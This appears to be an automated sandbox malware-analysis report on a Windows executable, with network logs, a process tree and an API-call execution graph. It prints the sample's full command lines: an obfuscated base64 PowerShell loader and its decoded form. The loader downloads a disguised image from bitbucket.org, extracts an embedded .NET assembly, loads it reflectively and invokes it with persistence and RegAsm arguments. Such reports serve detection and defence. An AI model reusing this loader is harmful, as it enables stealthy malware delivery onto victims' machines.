Feb 1, 2025 16:43:45.140199900 CET | 53 | 63938 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 1, 2025 16:43:45.127779961 CET | 192.168.2.6 | 1.1.1.1 | 0x3347 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 1, 2025 16:43:45.140199900 CET | 1.1.1.1 | 192.168.2.6 | 0x3347 | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Feb 1, 2025 16:43:45.140199900 CET | 1.1.1.1 | 192.168.2.6 | 0x3347 | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Feb 1, 2025 16:43:45.140199900 CET | 1.1.1.1 | 192.168.2.6 | 0x3347 | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
• bitbucket.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49709 | 185.166.143.49 | 443 | 6568 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-02-01 15:43:45 UTC | 98 | OUT | GET /dfghd/fgd/downloads/test.jpg?137113 HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
2025-02-01 15:43:46 UTC | 4800 | IN | HTTP/1.1 404 Not Found
Date: Sat, 01 Feb 2025 15:43:46 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 15017
Server: AtlassianEdge
Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
X-Used-Mesh: False
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
Etag: "7f7908308f366abffcf098bdafef16bb"
X-Dc-Location: Micros-3
X-Served-By: fba66d1138ab
X-Version: dedd26be6991
X-Static-Version: dedd26be6991
X-Request-Count: 2166
X-Render-Time: 0.047760963439941406
X-B3-Traceid: 2b02383bb86b411b8d755437b7c10aad
X-B3-Spanid: ccb633098079d451
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: base-uri 'self'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpuser.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.pr [TRUNCATED]
X-Usage-Quota-Remaining: 998977.061
X-Usage-Request-Cost: 1036.90
X-Usage-User-Time: 0.030391
X-Usage-System-Time: 0.000716
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Cache-Control: max-age=900
Age: 433
X-Cache: HIT
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: 3c78d39dd3954d19bc5bbdd6dbbab073
Atl-Request-Id: 3c78d39d-d395-4d19-bc5b-bdd6dbbab073
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Server-Timing: atl-edge;dur=94,atl-edge-internal;dur=3,atl-edge-upstream;dur=92,atl-edge-pop;desc="aws-eu-central-1"
Connection: close
2025-02-01 15:43:46 UTC 11584 IN Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta id="bb-bootstrap" data-current-user="{&quot;isAuthenticated&quot;: false, &quot;isKbdShortcutsEnabled&quot;: true, &quot;isSshEnabled&quot;: false}" /> <script nonce="2IRG/EMLEku6s9bePSW7tA==">if (wind
2025-02-01 15:43:46 UTC 3433 IN Data Ascii: </div> <script nonce="2IRG/EMLEku6s9bePSW7tA=="> window.__initial_state__ = {"global": {"geoip_country": null, "is_mobile_user_agent": false, "site_message": "", "needs_marketing_consent": false, "marketing_consent_locale": null, "whats_new_fe


                                                                                                                Target ID:0
                                                                                                                Start time:10:43:40
                                                                                                                Start date:01/02/2025
                                                                                                                Path:C:\Users\user\Desktop\00wVZ1NU5b.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user\Desktop\00wVZ1NU5b.exe"
                                                                                                                Imagebase:0x7ff7e74f0000
                                                                                                                File size:180'224 bytes
                                                                                                                MD5 hash:A11A8DA90AD22616CA604476CB9F2749
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:10:43:40
                                                                                                                Start date:01/02/2025
                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:cmd /c lol.vbs
                                                                                                                Imagebase:0x7ff6ad9d0000
                                                                                                                File size:289'792 bytes
                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:10:43:40
                                                                                                                Start date:01/02/2025
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:4
                                                                                                                Start time:10:43:41
                                                                                                                Start date:01/02/2025
                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs"
                                                                                                                Imagebase:0x7ff66e520000
                                                                                                                File size:170'496 bytes
                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:5
                                                                                                                Start time:10:43:41
                                                                                                                Start date:01/02/2025
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp
@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@RgBy@G8@bQBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@p@Ds@I@@g@C@@J@B0@GU@e@B0@C@@PQ@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@Ds@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@UgBl@GY@b@Bl@GM@d@Bp@G8@bg@u@EE@cwBz@GU@bQBi@Gw@eQBd@Do@OgBM@G8@YQBk@Cg@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@p@Ds@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz
@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@9@C@@RwBl@HQ@LQBD@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@LQBi@Hk@d@Bl@EE@cgBy@GE@eQ@g@CQ@ZQBu@GM@V@Bl@Hg@d@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B0@Hk@c@Bl@C@@PQ@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C4@RwBl@HQ@V@B5@H@@ZQ@o@Cc@d@Bl@HM@d@Bw@G8@dwBl@HI@cwBo@GU@b@Bs@C4@S@Bv@GE@YQBh@GE@YQBh@HM@Z@Bt@GU@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bt@GU@d@Bo@G8@Z@@g@D0@I@@k@HQ@eQBw@GU@LgBH@GU@d@BN@GU@d@Bo@G8@Z@@o@Cc@b@Bm@HM@ZwBl@GQ@Z@Bk@GQ@Z@Bk@GQ@YQ@n@Ck@LgBJ@G4@dgBv@Gs@ZQ@o@CQ@bgB1@Gw@b@@s@C@@WwBv@GI@agBl@GM@d@Bb@F0@XQ@g@Cg@JwB0@Hg@d@@u@Gk@a@Bi@GQ@Z@Bp@Ek@LwBz@GU@b@Bp@GY@LwBn@HI@bw@u@G0@YQBr@HU@cgBl@HM@YQBk@HM@ZQBo@HQ@ZQBi@C8@Lw@6@HM@Jw@s@C@@Jw@w@Cc@L@@g@Cc@UwB0@GE@cgB0@HU@c@BO@GE@bQBl@Cc@L@@g@Cc@UgBl@Gc@QQBz@G0@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:6
                                                                                                                Start time:10:43:41
                                                                                                                Start date:01/02/2025
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:10:43:43
                                                                                                                Start date:01/02/2025
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:25%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:43.3%
                                                                                                                  Total number of Nodes:982
                                                                                                                  Total number of Limit Nodes:49
7ff7e74f23eb RegOpenKeyExA 2513->2516 2514->2393 2516->2514 2517 7ff7e74f2420 RegQueryValueExA RegCloseKey 2516->2517 2517->2514 2519 7ff7e74f1c34 2518->2519 2520 7ff7e74f1c57 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2518->2520 2522 7ff7e74f4f2c 24 API calls 2519->2522 2520->2519 2521 7ff7e74f1cd4 ExitWindowsEx 2520->2521 2521->2519 2523 7ff7e74f1c50 2521->2523 2522->2523 2524 7ff7e74f86f0 7 API calls 2523->2524 2525 7ff7e74f1d02 2524->2525 2525->2386 2527 7ff7e74f5243 2526->2527 2528 7ff7e74f2f6b 2526->2528 2527->2528 2529 7ff7e74f524c FindResourceA LoadResource LockResource 2527->2529 2528->2407 2528->2408 2529->2528 2530 7ff7e74f528b memcpy_s FreeResource 2529->2530 2530->2528 2532 7ff7e74f77de 2531->2532 2541 7ff7e74f736a 2531->2541 2533 7ff7e74f86f0 7 API calls 2532->2533 2535 7ff7e74f30d9 2533->2535 2534 7ff7e74f7442 2534->2532 2537 7ff7e74f745f GetModuleFileNameA 2534->2537 2535->2407 2535->2423 2536 7ff7e74f7395 CharNextA 2536->2541 2538 7ff7e74f7494 2537->2538 2539 7ff7e74f7487 2537->2539 2538->2532 2607 7ff7e74f7fb8 2539->2607 2541->2532 2541->2534 2541->2536 2542 7ff7e74f794b 2541->2542 2545 7ff7e74f74b0 CharUpperA 2541->2545 2551 7ff7e74f7615 CharUpperA 2541->2551 2552 7ff7e74f75be CompareStringA 2541->2552 2553 7ff7e74f7673 CharUpperA 2541->2553 2554 7ff7e74f770a CharUpperA 2541->2554 2555 7ff7e74f7548 CharUpperA 2541->2555 2556 7ff7e74f7f48 IsDBCSLeadByte CharNextA 2541->2556 2612 7ff7e74f7e08 2541->2612 2619 7ff7e74f88c8 RtlCaptureContext RtlLookupFunctionEntry 2542->2619 2545->2541 2546 7ff7e74f78e7 2545->2546 2616 7ff7e74f1bc0 2546->2616 2549 7ff7e74f7904 ExitProcess 2550 7ff7e74f78f8 CloseHandle 2550->2549 2551->2541 2552->2541 2553->2541 2554->2541 2555->2541 2556->2541 2559 7ff7e74f2213 2558->2559 2562 7ff7e74f203d 2558->2562 2559->2434 2560 7ff7e74f2204 2561 7ff7e74f86f0 7 API calls 2560->2561 2561->2559 2562->2560 2563 7ff7e74f20cd FindFirstFileA 2562->2563 2563->2560 2564 7ff7e74f20ef 2563->2564 2565 7ff7e74f2194 2564->2565 
2566 7ff7e74f2129 lstrcmpA 2564->2566 2568 7ff7e74f21ca FindNextFileA 2564->2568 2571 7ff7e74f7e08 CharPrevA 2564->2571 2572 7ff7e74f2034 8 API calls 2564->2572 2569 7ff7e74f21a5 SetFileAttributesA DeleteFileA 2565->2569 2567 7ff7e74f2149 lstrcmpA 2566->2567 2566->2568 2567->2564 2567->2568 2568->2564 2570 7ff7e74f21e6 FindClose RemoveDirectoryA 2568->2570 2569->2568 2570->2560 2571->2564 2572->2564 2574 7ff7e74f3d8a 2573->2574 2578 7ff7e74f3d91 2573->2578 2575 7ff7e74f4f2c 24 API calls 2574->2575 2587 7ff7e74f3ffb 2575->2587 2576 7ff7e74f86f0 7 API calls 2577 7ff7e74f316a 2576->2577 2577->2434 2588 7ff7e74f1258 2577->2588 2578->2574 2580 7ff7e74f3ef5 2578->2580 2578->2587 2625 7ff7e74f2898 2578->2625 2580->2574 2581 7ff7e74f3fae MessageBeep 2580->2581 2580->2587 2582 7ff7e74f8154 13 API calls 2581->2582 2583 7ff7e74f3fc1 2582->2583 2584 7ff7e74f3fca MessageBoxA 2583->2584 2585 7ff7e74f8084 2 API calls 2583->2585 2584->2587 2585->2584 2587->2576 2589 7ff7e74f1421 2588->2589 2590 7ff7e74f12a8 2588->2590 2591 7ff7e74f86f0 7 API calls 2589->2591 2657 7ff7e74f1130 LoadLibraryA 2590->2657 2593 7ff7e74f1446 2591->2593 2593->2434 2593->2446 2595 7ff7e74f12b9 GetCurrentProcess OpenProcessToken 2595->2589 2596 7ff7e74f12e3 GetTokenInformation 2595->2596 2597 7ff7e74f140c CloseHandle 2596->2597 2598 7ff7e74f130c GetLastError 2596->2598 2597->2589 2598->2597 2599 7ff7e74f1321 LocalAlloc 2598->2599 2599->2597 2600 7ff7e74f133e GetTokenInformation 2599->2600 2601 7ff7e74f13fd LocalFree 2600->2601 2602 7ff7e74f1368 AllocateAndInitializeSid 2600->2602 2601->2597 2602->2601 2604 7ff7e74f13b1 2602->2604 2603 7ff7e74f13ed FreeSid 2603->2601 2604->2603 2605 7ff7e74f13be EqualSid 2604->2605 2606 7ff7e74f13e2 2604->2606 2605->2604 2605->2606 2606->2603 2608 7ff7e74f8029 2607->2608 2609 7ff7e74f7fd8 2607->2609 2608->2538 2610 7ff7e74f7fe0 IsDBCSLeadByte 2609->2610 2611 7ff7e74f8006 CharNextA 2609->2611 2610->2609 2611->2608 2611->2609 2613 7ff7e74f7e28 2612->2613 2613->2613 2614 
7ff7e74f7e3a 2613->2614 2615 7ff7e74f7e4c CharPrevA 2613->2615 2614->2541 2615->2614 2617 7ff7e74f4f2c 24 API calls 2616->2617 2618 7ff7e74f1be7 2617->2618 2618->2549 2618->2550 2620 7ff7e74f8905 RtlVirtualUnwind 2619->2620 2621 7ff7e74f8947 2619->2621 2620->2621 2624 7ff7e74f8714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2621->2624 2629 7ff7e74f28d5 2625->2629 2633 7ff7e74f2a9a 2625->2633 2627 7ff7e74f2abf GlobalFree 2628 7ff7e74f2aaa 2627->2628 2628->2580 2630 7ff7e74f2908 GetFileVersionInfoSizeA 2629->2630 2629->2633 2636 7ff7e74f2a59 GlobalUnlock 2629->2636 2637 7ff7e74f2a3e GlobalUnlock 2629->2637 2638 7ff7e74f2644 2629->2638 2630->2629 2631 7ff7e74f2926 GlobalAlloc 2630->2631 2631->2628 2632 7ff7e74f2946 GlobalLock 2631->2632 2632->2633 2634 7ff7e74f2961 GetFileVersionInfoA 2632->2634 2633->2627 2633->2628 2634->2629 2635 7ff7e74f2985 VerQueryValueA 2634->2635 2635->2629 2635->2636 2636->2629 2637->2627 2639 7ff7e74f2683 CharUpperA CharNextA CharNextA 2638->2639 2640 7ff7e74f2849 GetSystemDirectoryA 2638->2640 2641 7ff7e74f26c4 2639->2641 2642 7ff7e74f282f GetSystemDirectoryA 2639->2642 2643 7ff7e74f2843 2640->2643 2645 7ff7e74f26ce 2641->2645 2646 7ff7e74f2819 GetWindowsDirectoryA 2641->2646 2642->2643 2644 7ff7e74f7e08 CharPrevA 2643->2644 2647 7ff7e74f286a 2643->2647 2644->2647 2650 7ff7e74f7e08 CharPrevA 2645->2650 2646->2643 2648 7ff7e74f86f0 7 API calls 2647->2648 2649 7ff7e74f2879 2648->2649 2649->2629 2651 7ff7e74f272d RegOpenKeyExA 2650->2651 2651->2643 2652 7ff7e74f2760 RegQueryValueExA 2651->2652 2653 7ff7e74f2806 RegCloseKey 2652->2653 2654 7ff7e74f2793 2652->2654 2653->2643 2655 7ff7e74f279c ExpandEnvironmentStringsA 2654->2655 2656 7ff7e74f27ba 2654->2656 2655->2656 2656->2653 2658 7ff7e74f1185 GetProcAddress 2657->2658 2659 7ff7e74f1229 2657->2659 2660 7ff7e74f11a3 AllocateAndInitializeSid 2658->2660 2661 7ff7e74f121a FreeLibrary 2658->2661 2662 7ff7e74f86f0 7 API calls 2659->2662 2660->2661 2663 
